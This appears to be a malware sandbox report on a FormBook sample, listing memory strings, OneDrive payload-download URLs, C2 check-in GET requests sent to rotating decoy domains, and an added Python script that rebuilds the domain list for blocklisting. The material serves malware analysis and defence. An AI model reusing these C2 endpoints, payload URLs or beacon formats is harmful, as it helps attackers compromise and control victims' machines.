Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sprockettrucking.com/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sprockettrucking.com/ao65/www.leathfortexas.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sprockettrucking.comReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.stellarskyline.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.stellarskyline.com/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.stellarskyline.com/ao65/www.hivaom.top
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.stellarskyline.comReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.thnkotb.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.thnkotb.com/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.thnkotb.com/ao65/www.harmonicod.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.thnkotb.comReferer:
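Among the explorer.exe strings above, the rows of the form http://www.A/ao65/www.B are the useful ones: each pairs a decoy domain with the domain that follows it. The script below is an added example, not part of the Joe Sandbox report. It treats each such string as two adjacent entries of the injected payload's domain list read as one (because the separator between them was lost), walks the successor map into a single ordered list, and cross-checks that list against the order in which the report shows the hosts being contacted. That adjacency reading is this script's assumption, not something the report states; the cross-check is what gives it weight. MEMORY_STRINGS and CONTACT_ORDER are copied from the report rows; the function names are this script's own.

```python
"""Rebuild the FormBook decoy-domain order from the explorer.exe strings.

Added example, not part of the Joe Sandbox report. Assumption: a string
"http://www.A/ao65/www.B" means B is stored directly after A in the
payload's domain list. Verified here only by checking that the contact
order the sandbox recorded is a subsequence of the rebuilt list.
"""
import re

# Copied from the "String found in binary or memory" rows that carry a
# successor. The last entry is one of the rows without a successor; the
# parser skips it, which is what makes oaistetic.com the end of the chain.
MEMORY_STRINGS = [
    "http://www.1techtrendzstore.com/ao65/www.kuis-raja-borong.website",
    "http://www.canwealljustagree.com/ao65/www.ecofare.xyz",
    "http://www.ecofare.xyz/ao65/www.iokgw1.top",
    "http://www.harmonicod.com/ao65/www.kermisbedrijfkramer.online",
    "http://www.hivaom.top/ao65/www.canwealljustagree.com",
    "http://www.iokgw1.top/ao65/www.1techtrendzstore.com",
    "http://www.kermisbedrijfkramer.online/ao65/www.stellarskyline.com",
    "http://www.kuis-raja-borong.website/ao65/www.oaistetic.com",
    "http://www.leathfortexas.com/ao65/www.ouxodb001.cfd",
    "http://www.maltsky.net/ao65/www.thnkotb.com",
    "http://www.optimusvisionlb.com/ao65/www.maltsky.net",
    "http://www.ouxodb001.cfd/ao65/www.optimusvisionlb.com",
    "http://www.sprockettrucking.com/ao65/www.leathfortexas.com",
    "http://www.stellarskyline.com/ao65/www.hivaom.top",
    "http://www.thnkotb.com/ao65/www.harmonicod.com",
    "http://www.oaistetic.com/ao65/",
]

# Host headers in the order the report lists the check-in requests.
CONTACT_ORDER = [
    "www.leathfortexas.com", "www.optimusvisionlb.com", "www.maltsky.net",
    "www.thnkotb.com", "www.harmonicod.com", "www.kermisbedrijfkramer.online",
    "www.stellarskyline.com", "www.hivaom.top",
]

EDGE_RE = re.compile(r"^http://www\.(?P<cur>[^/]+)/(?P<path>[^/]+)/www\.(?P<nxt>[^/\s]+)$")


def parse_edges(strings):
    """Map each domain to its successor; refuse contradictory pairs."""
    edges, paths = {}, set()
    for s in strings:
        m = EDGE_RE.match(s)
        if m is None:
            continue  # plain "http://www.X/ao65/" rows carry no successor
        cur, nxt = m["cur"], m["nxt"]
        if edges.get(cur, nxt) != nxt:
            raise ValueError(f"{cur} has two different successors")
        edges[cur] = nxt
        paths.add(m["path"])
    return edges, paths


def rotation_order(edges):
    """Walk the successor map from its single head to the domain with no successor."""
    heads = set(edges) - set(edges.values())
    if len(heads) != 1:
        raise ValueError(f"expected one list head, found {sorted(heads)}")
    order = [heads.pop()]
    while order[-1] in edges:
        nxt = edges[order[-1]]
        if nxt in order:
            raise ValueError("successor map loops back; not a simple list")
        order.append(nxt)
    return order


def is_subsequence(needle, haystack):
    it = iter(haystack)
    return all(any(x == y for y in it) for x in needle)


def reconstruct(strings=MEMORY_STRINGS, contacted=CONTACT_ORDER):
    edges, paths = parse_edges(strings)
    order = rotation_order(edges)
    stripped = [h.removeprefix("www.") for h in contacted]
    return {
        "c2_path": paths.pop() if len(paths) == 1 else None,
        "order": order,
        "contact_order_consistent": is_subsequence(stripped, order),
        "not_seen_in_traffic": [d for d in order if d not in stripped],
    }


if __name__ == "__main__":
    for i, d in enumerate(reconstruct()["order"], 1):
        print(f"{i:2d} {d}")
```

The rebuilt list has sixteen domains, and the eight hosts the sandbox actually contacted appear in exactly that order, with ouxodb001.cfd the only gap inside the contacted stretch. The eight domains that never show up in the traffic are still part of the same list and belong on the same blocklist as the ones that did.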
Source: explorer.exe, 00000005.00000000.2336924818.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2979054042.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.00000000099AB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000005.00000000.2345200413.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4629484500.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000005.00000000.2334366335.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000962B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000005.00000000.2334366335.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000962B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/I
Source: explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000005.00000000.2334366335.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000962B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: explorer.exe, 00000005.00000002.4629484500.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2980040926.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2345200413.000000000C048000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com-
Source: explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: Telragab.PIF, 0000000B.00000002.2686612744.00000000009A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/
Source: Telragab.PIF, 00000009.00000003.2546924486.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/(
Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000872000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/?
Source: Telragab.PIF, 00000009.00000003.2546924486.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/E
Source: Telragab.PIF, 0000000B.00000003.2627665881.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2686612744.00000000009A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/e
Source: Telragab.PIF, 0000000B.00000003.2627665881.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2686612744.00000000009A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/t
Source: Telragab.PIF, 00000009.00000003.2546924486.0000000000796000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/w
Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000886000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2546924486.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2686612744.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000003.2627665881.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://naopta.bn.files.1drv.com/
Source: Telragab.PIF, 0000000B.00000002.2686612744.00000000009A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://naopta.bn.files.1drv.com/y4m4gdZgN9vpD5zAE34F6nOBodS76VsiZvQO69itA_Kz97aCmsmB5p4T1sYe5ZzwMe6
Source: Telragab.PIF, 0000000B.00000002.2686612744.00000000009A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://naopta.bn.files.1drv.com/y4mUDOC-1KaMFlmbquo_MCuV35VY0DNhAx1uT2j8j4iW_6OvPBYM_BkkkKs9VVlfZP7
Source: Telragab.PIF, 0000000B.00000003.2627665881.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://naopta.bn.files.1drv.com/y4mWheWVd_ulVA7I3cjlifsQ_hjAjUwAiOhs_rGTjyEnBf6dISBKjP9LuUpM-ahNhLD
Source: Telragab.PIF, 00000009.00000003.2546924486.0000000000796000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://naopta.bn.files.1drv.com/y4mb0GM36UMcQfEUiMpLP03Y8bvo9LtwS-BqKbXqgBYhMdWptkR9dr4YpWcIo8Dgkas
Source: Telragab.PIF, 00000009.00000002.2579759920.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000742000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://naopta.bn.files.1drv.com/y4mbKR8EFV2GjaLZUNxo34xSffY_nOEJNB-_msmauZ_D4C9ZlBli6oXkwvRloeD9ztd
Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000886000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://naopta.bn.files.1drv.com/y4mkyT3e9ftNlbXtjIFcL8z3YMEEbeJfXibBwh-99Rm7Ot1eMTdDYyDRGAjFrO7mgVv
Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.0000000000812000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://naopta.bn.files.1drv.com/y4mu7B-5fk8szYFW7t5U8GAGFWHz18vQ3lOohdWuW1sD9KC1dexn3z8c44A7Y_qMtHF
Source: Telragab.PIF, 0000000B.00000002.2686612744.00000000009AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://naopta.bn.files.1drv.com:443/y4mUDOC-1KaMFlmbquo_MCuV35VY0DNhAx1uT2j8j4iW_6OvPBYM_BkkkKs9VVl
Source: Telragab.PIF, 0000000B.00000003.2627665881.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://naopta.bn.files.1drv.com:443/y4mWheWVd_ulVA7I3cjlifsQ_hjAjUwAiOhs_rGTjyEnBf6dISBKjP9LuUpM-ah
Source: Telragab.PIF, 00000009.00000003.2578378839.0000000000742000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://naopta.bn.files.1drv.com:443/y4mbKR8EFV2GjaLZUNxo34xSffY_nOEJNB-_msmauZ_D4C9ZlBli6oXkwvRloeD
Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.000000000087C000.00000004.00000020.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000002.2319332034.000000000087C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://naopta.bn.files.1drv.com:443/y4mu7B-5fk8szYFW7t5U8GAGFWHz18vQ3lOohdWuW1sD9KC1dexn3z8c44A7Y_q
Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.0000000000869000.00000004.00000020.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000866000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000742000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2686612744.000000000095E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/
Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2258996641.0000000000872000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/download?r
              Source: Telragab.PIF, 0000000B.00000002.2688655343.0000000002B85000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=D2FF5C6240820574%21465&authkey=
              Source: explorer.exe, 00000005.00000002.4629484500.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2980040926.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2345200413.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
              Source: explorer.exe, 00000005.00000002.4629484500.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2345200413.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
              Source: explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/
              Source: explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/cp/
              Source: explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/
              Source: explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/cp/
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000005.00000000.2336924818.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2979054042.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
              Source: explorer.exe, 00000005.00000002.4629484500.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2980040926.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2345200413.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
              Source: explorer.exe, 00000005.00000002.4618835071.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
              Source: explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.stellarskyline.com/ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt
              Source: explorer.exe, 00000005.00000002.4633580692.0000000010E6F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.00000000052AF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/services/search-domains/
              Source: unknown | DNS traffic detected: queries for: onedrive.live.com
              Source: global traffic | HTTP traffic detected: GET /ao65/?3f94p=ys1nmsb6X1mQM1Jd478oiUQn9vuATHYUt4Dy8pL3kyVIlzOboPcsTdVyW5SVB7hST99gmWn6+w==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1 | Host: www.leathfortexas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
              Source: global traffic | HTTP traffic detected: GET /ao65/?3f94p=Olh8eEjR5IT46fH2PeVd1Lc15fw8Z1PVOirT2eqb4t/bi7TTuO6yJGtOPy5w7PRh9e2z8DbdcQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1 | Host: www.optimusvisionlb.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
              Source: global traffic | HTTP traffic detected: GET /ao65/?3f94p=U+zAKk5GFPF9sXmyHB7CBujsr49+ry/l09LFQEQGSX0L4+hNQ2paLAM2kd/yuXu6AcnnHpW1KQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1 | Host: www.maltsky.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
              Source: global traffic | HTTP traffic detected: GET /ao65/?3f94p=1+k7ryNQzoPRnNssVcxEVGqYVXcpdNYnwR6YaRuf8QIEqfcPbXX6k2BVupn8sj0YeeXTfXT4xQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1 | Host: www.thnkotb.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
              Source: global traffic | HTTP traffic detected: GET /ao65/?3f94p=SIOjWgUx9Sz9T19JihLVHEMNoaK2maww+N41rkYkWun2OwaoSexibxzMqiX45PItRVwWmDJ2nA==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1 | Host: www.harmonicod.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
              Source: global traffic | HTTP traffic detected: GET /ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1 | Host: www.kermisbedrijfkramer.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
              Source: global traffic | HTTP traffic detected: GET /ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt+uk8nfyPBl3lilEqIH7Lfnspwggtew==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1 | Host: www.stellarskyline.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
              Source: global traffic | HTTP traffic detected: GET /ao65/?3f94p=B3GcozZs3ohtof+Eq3ZwUrCdoNWOjNCPbyllHAjlOtmwH5sozkgIB7xqH4//btWoobo3GMsY9g==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1 | Host: www.hivaom.top | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
              Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 30 Nov 2023 13:57:23 GMT | Content-Type: text/html | Content-Length: 150 | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>
